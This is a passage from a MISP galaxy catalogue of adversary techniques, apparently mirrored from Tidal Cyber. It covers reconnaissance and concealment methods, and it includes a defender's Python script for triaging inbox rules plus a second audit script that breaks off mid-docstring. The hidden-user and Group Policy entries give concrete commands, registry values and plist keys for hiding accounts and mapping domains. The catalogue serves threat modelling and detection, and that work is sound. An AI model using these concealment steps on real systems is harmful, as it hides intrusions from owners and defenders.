Availability](https://app.tidalcyber.com/references/dddf33ea-d074-4bc4-98d2-39b7e843e37d)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Domain Properties"

IP Addresses

Adversaries may gather the victim’s IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and/or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="IP Addresses"

Network Security Appliances

Adversaries may gather information about the victim’s network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06).<sup>[[Nmap Firewalls NIDS](https://app.tidalcyber.com/references/c696ac8c-2c7a-4708-a369-0832a493e0a6)]</sup> Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Network Security Appliances"

Network Topology

Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Network Topology"

Network Trust Dependencies

Adversaries may gather information about the victim’s network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[Pentesting AD Forests](https://app.tidalcyber.com/references/3ca2e78e-751e-460b-9f3c-f851d054bce4)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Network Trust Dependencies"

Gather Victim Network Information

Adversaries may gather information about the victim’s networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Gather Victim Network Information"

Business Relationships

Adversaries may gather information about the victim’s business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Business Relationships"

Determine Physical Locations

Adversaries may gather the victim’s physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).

The tag is: misp-galaxy:technique="Determine Physical Locations"

Identify Business Tempo

Adversaries may gather information about the victim’s business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Identify Business Tempo"

Identify Roles

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Identify Roles"

Gather Victim Org Information

Adversaries may gather information about the victim’s organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Gather Victim Org Information"

Group Policy Discovery

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path <code>\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.<sup>[[Microsoft gpresult](https://app.tidalcyber.com/references/88af38e8-e437-4153-80af-a1be8c6a8629)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup> Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://app.tidalcyber.com/technique/d092a9e1-63d0-415d-8cd0-666a261be5d9)) for their benefit.

The tag is: misp-galaxy:technique="Group Policy Discovery"

Hardware Additions

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.<sup>[[Ossmann Star Feb 2011](https://app.tidalcyber.com/references/1be27354-1326-4568-b26a-d0034acecba2)]</sup><sup>[[Aleks Weapons Nov 2015](https://app.tidalcyber.com/references/fd22c941-b0dc-4420-b363-2f5777981041)]</sup><sup>[[Frisk DMA August 2016](https://app.tidalcyber.com/references/c504485b-2daa-4159-96da-481a0b97a979)]</sup><sup>[[McMillan Pwn March 2012](https://app.tidalcyber.com/references/6b57e883-75a1-4a71-accc-2d18148b9c3d)]</sup>

The tag is: misp-galaxy:technique="Hardware Additions"

Email Hiding Rules

Adversaries may use email rules to hide inbound emails in a compromised user’s mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets on Windows systems.<sup>[[Microsoft Inbox Rules](https://app.tidalcyber.com/references/91ce21f7-4cd5-4a75-a533-45d052a11c5d)]</sup><sup>[[MacOS Email Rules](https://app.tidalcyber.com/references/f83283aa-3aaf-4ebd-8503-0d84c2c627c4)]</sup><sup>[[Microsoft New-InboxRule](https://app.tidalcyber.com/references/54fcfc36-e0d5-422f-8a45-eeb7fa077a93)]</sup><sup>[[Microsoft Set-InboxRule](https://app.tidalcyber.com/references/28cc6142-cc4f-4e63-bcff-94347bc06b37)]</sup>

Adversaries may utilize email rules within a compromised user’s mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. <sup>[[Microsoft Cloud App Security](https://app.tidalcyber.com/references/be0a1168-fa84-4742-a658-41a078b7f5fa)]</sup>

In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.<sup>[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)]</sup> Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).
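A defender-side triage of the rule properties described above, as an added example that is not part of the MISP galaxy or of Tidal Cyber's material. The rule records are constructed in memory; their field names follow the New-InboxRule/Set-InboxRule parameter names, but the record layout itself is an assumption rather than a documented export format.

```python
"""Triage exported mailbox inbox rules for "email hiding" patterns.

Added example, not code from the MISP galaxy or from Tidal Cyber. The rule
records are constructed to resemble a JSON export of Exchange inbox rules;
the field names mirror New-InboxRule / Set-InboxRule parameter names, but
the record layout is an assumption, not a documented schema.
"""

# Filter terms the technique description lists as common in malicious rules.
SUSPICIOUS_KEYWORDS = ("malware", "suspicious", "phish", "hack")

# Destination folders where a moved message is unlikely to be noticed.
LOW_VISIBILITY_FOLDERS = ("rss feeds", "rss subscriptions", "conversation history",
                          "junk email", "deleted items", "archive")


def keyword_hits(terms):
    """Return the rule conditions that contain one of the suspicious keywords."""
    return [t for t in terms if any(kw in t.lower() for kw in SUSPICIOUS_KEYWORDS)]


def triage_rule(rule):
    """Return the reasons one rule looks like an email hiding rule (empty list = clean)."""
    reasons = []
    terms = (list(rule.get("SubjectContainsWords", []))
             + list(rule.get("BodyContainsWords", []))
             + list(rule.get("FromAddressContainsWords", [])))
    hits = keyword_hits(terms)
    target = (rule.get("MoveToFolder") or "").lower()
    hidden_target = any(target.endswith(folder) for folder in LOW_VISIBILITY_FOLDERS)
    hides = bool(rule.get("DeleteMessage")) or hidden_target

    if hits and hides:
        action = "deletes" if rule.get("DeleteMessage") else f"moves to {rule['MoveToFolder']!r}"
        reasons.append(f"{action} mail matching security keywords: {', '.join(hits)}")
    if hidden_target and rule.get("MarkAsRead"):
        reasons.append(f"moves mail to low-visibility folder {rule['MoveToFolder']!r} and marks it read")
    return reasons


def triage_rules(rules):
    """Map rule name -> reasons for every rule that triggered at least one reason."""
    findings = {}
    for rule in rules:
        reasons = triage_rule(rule)
        if reasons:
            findings[rule["Name"]] = reasons
    return findings


# Constructed sample export: one benign rule and three that match the technique.
SAMPLE_RULES = [
    {"Name": "Newsletters", "SubjectContainsWords": ["newsletter"],
     "MoveToFolder": "\\Newsletters"},
    {"Name": "Cleanup", "SubjectContainsWords": ["phish", "suspicious", "hacked"],
     "BodyContainsWords": ["malware"], "DeleteMessage": True, "MarkAsRead": True},
    {"Name": "Reports", "FromAddressContainsWords": ["phishing-report@corp.example"],
     "DeleteMessage": True},
    {"Name": "Feeds", "SubjectContainsWords": ["security incident"],
     "MoveToFolder": "\\RSS Subscriptions", "MarkAsRead": True},
]

if __name__ == "__main__":
    for name, reasons in triage_rules(SAMPLE_RULES).items():
        print(f"[!] {name}")
        for reason in reasons:
            print(f"    - {reason}")
```

The same checks apply to Exchange transport rules, which should be reviewed organization-wide rather than per mailbox.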

The tag is: misp-galaxy:technique="Email Hiding Rules"

Hidden Files and Directories

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls -a</code> for Linux and macOS).

On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name <sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup> <sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>. Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app <sup>[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]</sup>. On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system and evade a typical user or system analysis that does not incorporate investigation of hidden files.

The tag is: misp-galaxy:technique="Hidden Files and Directories"

Hidden File System

Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.<sup>[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]</sup>

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.<sup>[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]</sup><sup>[[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)]</sup> Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.<sup>[[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)]</sup> Adversaries may also fragment files across the existing file system structure in non-standard ways.<sup>[[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]</sup>

The tag is: misp-galaxy:technique="Hidden File System"

Hidden Users

Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.

In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.<sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup> Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user’s home folder by changing the <code>chflags</code> to hidden.<sup>[[Apple Support Hide a User Account](https://app.tidalcyber.com/references/e901df3b-76a6-41a5-9083-b28065e75aa2)]</sup>

Adversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.<sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup><sup>[[US-CERT TA18-074A](https://app.tidalcyber.com/references/94e87a92-bf80-43e2-a3ab-cd7d4895f2fc)]</sup>

On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manager (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).<sup>[[Hide GDM User Accounts](https://app.tidalcyber.com/references/88c3c460-3792-4881-ae7d-031c8901610d)]</sup> Display Managers are not anchored to specific distributions and may be changed by a user or adversary.
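An audit of the macOS and Windows hiding mechanisms described above, as an added example that is not part of the MISP galaxy or of Tidal Cyber's material. The inputs are constructed stand-ins for what a collector would gather (the loginwindow plist as a dict, per-user directory attributes, the Winlogon UserList values); the record layout and the <code>HomeFlags</code> field are assumptions.

```python
"""Audit local account records for the hidden-user techniques described above.

Added example, not code from the MISP galaxy or from Tidal Cyber. Inputs are
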